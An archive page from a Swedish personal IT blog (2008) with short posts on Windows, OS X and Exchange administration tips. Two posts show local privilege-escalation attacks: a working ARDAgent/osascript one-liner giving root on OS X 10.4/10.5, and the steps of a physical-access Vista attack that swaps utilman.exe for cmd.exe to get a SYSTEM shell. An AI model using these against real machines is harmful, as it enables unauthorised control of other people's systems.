tisdag 22 juli 2008

SP3 och RWW active-x

det har varit lite surr på nätet om att active-x komponenten för rdp slutar att fungera om man installerar sp3 för XP.


så här löste jag det:
REG DELETE HKEY_CLASSES_ROOT\TypeLib\{AF586AAE-B62A-420E-B796-294E7EE64C70} /va /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{AF586AAE-B62A-420E-B796-294E7EE64C70} /va /f
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\MUILanguages\RCV2\msrdp.ocx /va /f
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control\Nls\MUILanguages\RCV2\msrdp.ocx /va /f
regsvr32 /s /u msrdp.ocx


REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{7584C670-2274-4EFB-B00B-D6AABA6D3850}\iexplore
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7584C670-2274-4EFB-B00B-D6AABA6D3850}\iexplore\ /v Flags /t REG_DWORD /d 4 /f

tisdag 1 juli 2008

dagens konstiga XP-kommando, GUI edition

iexpress:

skapa ett självextraherande arkiv. känns helt gammeldags och NT4. men den funkar. och jag har aldrig sett den i bruk. men lik förbannat finns den med i XP :).


dagens konstiga XP-kommando:

blastcln:

inbyggt i XP finns ett verktyg för att ta bort msblaster. mycket aktuellt. och det känns lite märkligt att MS skulle skicka med ett removaltool för ett specifikt virus med operativet.

C:\WINDOWS>blastcln /v
Microsoft Blaster/Nachi removal tool started on Tue Jul 01 11:24:08 2008
Checking 116 services.
Checking 68 processes.
Checking startup registry keys.
Checking known Blaster/Nachi filenames.
**** No Blaster/Nachi infection found ****
Microsoft Blaster/Nachi removal tool stopped.

måndag 30 juni 2008

mysteriet med opera

märkte häromdan när jag skulle ladda hem en torrent att förvalt program var opera.app(!). helt sjukt. inte att använda opera, men att det finns på min dator utan att jag själv laddat hem det. det ligger inte heller som ett normalt installerat program i program-mappen.

efter lite forskande upptäckte jag det här.

adobe skickar alltså helt fräckt med opera som en del av CS3.

måndag 23 juni 2008

lokal attack på os x

var tvungen att följa upp med ett lika läskigt hack för os x som det jag bloggade om för vista häromsistens.

just nu är 10.4 och 10.5 iaf sårbara för följande lokala exploit:

robin-engstroms-macbook-pro-15:~ re$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

inget lösenord för att köra något som root, ingenting.
kräver dock fysisk access och att Screen Sharing är aktiverat (vilket är default på 10.5). funkar inte via SSH.

söndag 22 juni 2008

exchange-gänget på microsoft har humor

i exchange 2007 används varken Routing Groups eller Administrative Groups längre.

istället används Active Directory siter och site-länkar för Routing Groups och delegation av behörigheter sköts på ett annat, smidigare sätt och gör Administrative groups överflödiga.

dock skapas både en Routing Group och en Administrative Group när man installerar första exchange 2007 servern i sin organisation. detta för att gamla Exchange System Manager inte ska spåra ut.
nu till humorn:
Exchange Administrative Group döps automatiskt till FYDIBOHF23SPDLT
Exchage Routing Group döps automatiskt till DWBGZMFD01QNBJR

tänk ceasar-rullning ett steg.. EXCHANGE12ROCKS

skoj va?

men så heter ju officiella exchange-bloggen: "you had me at EHLO"- världens roligaste bloggnamn.
märkte precis att wireless i windows server 2008 inte är aktiverat default.

för att lägga till:

server manager > add features > wireless LAN service.

måndag 9 juni 2008

nostalgitripp

microsoft har släppt ett web-spel som talar till alla oss som älskar äventyrsspelen som sierra och lucasgames släppte på 90-talet.

http://www.server-quest.com

serverquest

 

 

det är ju technet-reklam rakt av. och väldigt mycket “heros happens here”. men jag gillar det ändå.

visst. om man ska vara kritisk så avskyr jag actioninslag i äventyrsspel. som i leasure suit larry på xboxen t.ex. men detta är roligt ändå.

måndag 26 maj 2008

lokal attack på vista

http://www.offensive-security.com/movies/vistahack/vistahack.html

går iofs klockrent in under:
Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore

men rätt intressant och smart.

attacken går ut på att man
  1. bootar en linux livecd som kan skriva NTFS.
  2. döper om c:\windows\system32\cmd.exe till c:\windows\system32\utilman.exe
  3. bootar om till vista och trycker WIN-U.

tada! cmd prompt med localsystem rättigheter.


ännu en anledning att köra bitlocker/truecrypt/pointsec osv på systemdisken.

fredag 16 maj 2008

ms

jag har börjat gilla microsoft. riktigt mycket. dom har gjort mycket saker väldigt rätt senaste par åren.
ibland får jag höra att jag låter som en microsoftsäljare när jag pratar om någon produkt.

men ofta skjuter dom sig i foten. som med det här t.ex:

DVD Playback Pack for Windows Vista
DVD functionality in the enterprise has become a growing necessity. Whether it is corporate sales and marketing tools on DVD or training videos for customers and employees, the use of DVD formats in the corporate world continues to grow. To accommodate the growing need of this media in the enterprise, Microsoft is offering the DVD Playback Pack for Windows Vista Enterprise and Windows Vista Business. The Playback Pack allows users to play DVD, MPEG-2, and Dolby 5.1 content.

The combination of Windows Vista Enterprise or Windows Vista Business and the DVD Playback Pack is the most manageable version of Windows with the best media experience for the enterprise. Windows Vista Ultimate is not designed for broad enterprise deployment and should be used for conference and training rooms only.

DVD Playback Pack for Windows Vista is designed to be used by IT professionals and should only be distributed as part of an operating system image.

DVD Playback Pack is available through the Microsoft Volume Licensing division. For more information on ordering DVD Playback Pack, visit Microsoft Volume Licensing.



VARFÖR SKA DET VARA SÅ SVÅRT ATT SPELA UPP EN DVD?! hur kan det inte vara en del av ett grundinstallerat os liksom?

måndag 5 maj 2008

Bläddra i telefonminne via blutooth i Mac OS X

som jag har letat.
har hetsgooglat i omgångar men aldrig hittat funktionen som finns i Sony Ericssons PCSuite för Windows som gör att man kan bläddra en telefons minne via bluetooth.

och igår av en slump hittade jag hur man gör:

börja med att köra bluetooth inställningsguide och para ihop telefonen med datorn.

sen:








det var ju pisslätt. frågan är om bläddramöjligheten kommit med nån uppdatering och inte fanns när jag letade sist.

torsdag 10 april 2008

CCIE-jackan från cisco

en gång i tiden när jag gick min första nätverkskurs berättade läraren (christer hammarström) om ciscos certifieringsprogram och om det ouppnåeliga CCIE. man skulle enligt uppgift få en skinnjacka som det stod cisco på ryggen på om man klarade det djuriska testet.

jag har aldrig hört något mer om den där skinnjacka sen dess. tills jag hittade den idag hos företaget som gjorde den:



kungligt med sitt CCIE# på bröstet.

torsdag 3 april 2008

förläng vistas aktiveringstid

sitter och läser Exam Prep: Configuring Windows Vista och hittade ett litet faktafel som jag tänkte klargöra här.

i boken står:
The period of time before you absolutely have to activate Vista is 30 days. If you do
not activate Vista on time, it enters a “reduced functionality mode” in which you can only perform certain
actions.


detta stämmer inte riktigt.
i vista kan man nämligen utöka tiden innan man måste aktivera med 30 dagar tre gånger.
alltså, man kan köra vista i 120 dagar innan man måste aktivera. lite mer lagom tid om man bara vill labba lite alltså (misstänker att detta trick även funkar i server 2008).

knepet är ett vbscript som heter slmgr.vbs och som finns i system32 (slmgr fanns även med i XP och var den så kallade "aktiveringsguiden". om man någon gång behövde byta produktnyckel på en XP så kunde man köra den med en växel jag inte minns).

ok. till vista. så här skriver man:
slmgr -rearm
när kommandot körts så är man tillbaka på dag 0 igen.


en annan fiffig grej med slmgr är att man kan se sista biten av produktnyckeln man använde för att installera systemet. kan vara användbart om man installerar mycket burkar och har lite olika nycklar att hålla reda på.
då kör man:
slmgr -dlv



gulligt va?

söndag 23 mars 2008

Microsoft Deployment

att det skulle vara så jävla svårt.




försöker lära mig MDT genom att göra något som det inte är designat för,

nämligen:
  1. ta en nyinstallerad dator med XP, boota på WinPE, köra imagex capture på c: och spara wim-filen på typ USB-minne.
  2. boota WinPE och få den att partitionera/formatera hårddisken och sen deploya wim-filen som jag skapat.
detta vill jag göra från ett flyttbart media, dvs DVD eller nåt USB-baserat. INTE via nätverket.
inte helt självklart. men nu är jag jävligt nära känner jag.


smart skit det där MDT. grymt coolt (om man jämför med gamla ruttna RIS).


EDIT 2008-06-23:
okej, allt jag hade problem med när jag skrev detta löser man med LiteTouch från Deployment-konsollen och lite dokumentation.

torsdag 13 mars 2008

"wget" i windows?

satt vid en dator idag som behövde ladda hem en fil från en rutten hemsida och en utrullad active-x plugin tog över och gjorde det omöjligt att få hem skiten. jag kände i magen att om jag bara hade ett inbyggt program/kommando i windows som kan ta en url till en fil och spara ner den så skulle jag vara guld. som wget eller curl hade gjort om man kört unix-baserat.

satt och svor en stund över att ftp i konsollen inte är lika smart som i openbsd. sen laddade jag hem en win32 kompilerad wget och kände mig besegrad.

finns det verkligen ingen motsvarighet inbyggt i operativet?

här kommer ett vbscript som fixar biffen:

set xpost = createobject("microsoft.xmlhttp")
xpost.open "GET","http://www.sunet.se/index.html",0
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "c:\users\robin\desktop\index.html",2


har haft det liggande på desktopen hemma ett tag och nu var ett bra läge att blogga skiten.

torsdag 6 mars 2008

activesync till iphone i sommar

Apple has licensed Exchange ActiveSync from Microsoft and is building it right into the iPhone, so that iPhone will connect out-of-the-box to Microsoft Exchange Servers 2003 and 2007 for secure over-the-air push email, contacts, calendars and global address lists. Built-in Exchange ActiveSync support also enables security features such as remote wipe, password policies and auto-discovery.


måtte bara iphone komma med 3g tills dess också. sen vore man hemma.

torsdag 21 februari 2008

byta host-os på macen

jag kör jävligt mycket vmware i osx på min macbook pro. och ibland (rätt ofta) så känner jag att det är i windows jag hör hemma.

om parallels eller vmware hade haft kunnat köra osx virtualiserat innifrån vista/xp hade det varit guld.
då hade jag blåst burken, dunkat in vista och ändå kunnat köra lite osx när suget faller på.

bootcamp faller tyvärr på att det kräver för mycket disk.


eller man kanske skulle köpa en större och sätta i. hmm.

söndag 10 februari 2008

draganddropupload

https://addons.mozilla.org/en-US/firefox/addon/2190

guds gåva till alla som kör blogger eller skickar mycket mail med attachments i gmail.

onsdag 6 februari 2008

truecrypt 5.0

nyheter i version 5:
  • kryptering av hela diskar inklusive boot!
  • stöd för mac os x
  • gui för linux


verkar rätt mycket snabbare än pointsec på att kryptera en hel disk.

måndag 4 februari 2008

daemontools/virtualcd/alcohol120 osv osv

ibland måste man montera en imagefil. och ibland har man inte lust att warez:a eller råka få med äcklig spyware på köpet (typ daemontools).

hittade det här av en slump tidigare idag:
http://download.microsoft.com/download/7/b/6/7b6abd84-7841-4978-96f5-bd58df02efa2/winxpvirtualcdcontrolpanel_21.exe


microsoft har ett gratistool som fixar biffen! 61kb download, grafiks gränssnitt, kräver ingen omboot och installerar inga vidriga shell extensions.

shit, intel AMT är ball

http://communities.intel.com/servlet/JiveServlet/previewBody/1339-102-1-1418/UG3_Deploying_Intel_vPro__v1.20_120707.pdf

torsdag 24 januari 2008

årets kommando!

för att stänga av systemhögtalaren i XP/Vista:

net stop beep


tänk att man kan ha levt så här länge i windowsmiljö utan att vetat det.

tisdag 22 januari 2008

låsa datorn i osx

arbetandes i windows sitter WIN+L i ryggmärgen när man reser sig från skrivbordet. och i unix har man alltid xlock.
men hur fan gör man i osx?

jo.

  1. öppna Keychain (eller Nyckelhanterare i svensk version).
  2. under inställningar finns valet "visa i menyraden". klicka i det.
  3. det har nu dykt upp ett litet lås i menyn. klickar man på det så finns valet "lås skärm"
  4. PROFIT!